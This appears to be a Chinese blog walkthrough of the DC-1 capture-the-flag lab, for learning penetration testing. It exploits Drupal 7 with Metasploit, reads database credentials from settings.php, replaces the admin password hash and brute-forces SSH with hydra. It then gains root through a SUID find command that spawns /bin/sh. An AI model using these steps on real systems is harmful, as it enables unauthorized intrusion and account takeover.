【DC系列】DC-1靶场

首先下载DC1的镜像资源：Index of /downloadshttps://www.five86.com/downloads/

下载完成后进行解压，鼠标右击DC-1镜像->打开方式->选择虚拟机。

如下图所示：

输入虚拟机名称和选择虚拟机的存储路径后点击导入。

当出现以下报错信息时直接点击重试即可：

 导入成功后，鼠标右击DC-1虚拟机->设置->网络适配器->nat模式->确定：（虚拟机kali最好也选择nat模式，保证双方在同一网段上）

然后点击开启虚拟机，如果出现报错，点击否即可，

如果出现如下画面则表示启动成功：

 到这里环境就搭建完成了，下面进行渗透测试：
1.信息收集

查看DC1虚拟机的Mac地址：鼠标右击DC-1虚拟机->设置->网络适配器->高级。

打开虚拟机kali->启动终端:

主机发现：nmap -sn 192.168.17.0/24   //注意：此处为你nat模式下的ip网段

得到DC-1的ip地址为：192.168.17.166

nmap -A -p- 192.168.17.166

(-A:使用高级功能进行扫描，即全面扫描；-p-:扫描端口号1-65535，与-p 1-65535相同意思)

通过扫描结果可知端口22,80,111,39206端口是开放的。 

在物理机的火狐浏览器访问192.168.17.166:

通过火狐浏览器的Wappalyzer插件知道网站的CMS是Drupal 7,编程语言是PHP 5.4.45;

利用搜索引擎查找有关Drupal 7的漏洞：inurl:Drupal 7漏洞

 知道该CMS存在漏洞，就轮到美少妇（msf）出场了。

2.漏洞利用

 在kali终端启动msf:msfconsole

查找有关Drupal 7的漏洞：search Drupal 7.x

存在利用模块:use 0 

显示选项：show options

设置远程目标主机的ip:set  rhosts 192.168.17.166   //DC-1的ip地址

开始利用：run或exploit都可以

显示下图则利用成功：

获取普通shell：shell

进入交互式shell:python -c 'import pty; pty.spawn("/bin/bash")'

 列出目录中的文件及子目录的名称：dir

发现flag1.txt,查看该文件:cat flag1.txt

提示寻找CMS的配置文件，利用百度进行搜索：inurl:Drupal 配置文件

 查找settings.php文件：

 find -name 'settings.php'

查看该文件：

cat ./sites/default/settings.php

可以看到flag2和数据库的相关信息（数据库名称：drupaldb,用户名:dbuser，密码：R0ck3t） 

尝试连接数据库：mysql -udbuser -pR0ck3t（-u后给出用户名,-p后给出密码）

使用drupaldb数据库：use drupaldb;

查看数据库的所有表名： show tables;

 发现两个有关users的表：

 

查看users表：select * from users;
发现密码被加密过： 

先退出mysql，查找加密文件：

exit;

找到Drupal的加密脚本：

/var/www/scripts/password-hash.sh

查看该文件，发现是用php语言编写：

可利用php + 加密脚本 + 密码得到加密后的密码：

php /var/www/scripts/password-hash.sh 123456

复制加密后的密码，再次进入数据库，然后将users表admin用户的密码更改为自己加密后的密码：

 update users set pass = "$S$DOp8U3lzGVGwxESLWgcjgnQdtr8DBkUFyz2sJTq12uTAbJKIpk3n" where name = "admin";

然后使用admin:123456（用户名：admin，密码：123456）登录网站：http://192.168.17.166

登录成功后点击Content->flag3。

 提示获取shadow中的内容，看到shadow,又因为DC-1是linux系统，想到的就是/etc/shadow文件。

尝试查看/etc/shadow文件，访问被拒绝， 应该是权限不够。

知识点：

/etc/passwd:存储系统用户的基本信息，所有用户都可以访问

/etc/shadow：存储系统用户的密码等信息，只有root权限才可以访问。

查看/etc/passwd文件，发现有关flag4的信息：

想到利用nmap扫描出来的22端口，开启的是ssh服务，有可能flag4就是ssh的用户名，尝试爆破密码：（启动另外一个kali终端，使用hydra工具进行爆破）

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz 192.168.17.166 ssh

-l:指定用户名

-P:指定爆破的密码字典

 成功爆破出密码后进行ssh连接：（ssh 用户名@开启了ssh服务的ip地址），输入爆破出来的密码

连接成功后查看当前文件内容：ls

发现flag4.txt,查看该文件：cat flag4

提示使用相同的方法查找或访问根目录中的flag,应该是要进行提权：

这里利用suid进行提权，

查看具有root用户权限的SUID文件：

find / -perm -u=s -type f 2>/dev/null

find / -name index.php -exec "/bin/sh" \;

 成功提权后进入到root目录下，发现最后的flag。

本人第一次写博客，还存在很多问题，各位读者在阅读时若有疑问可在评论区留言。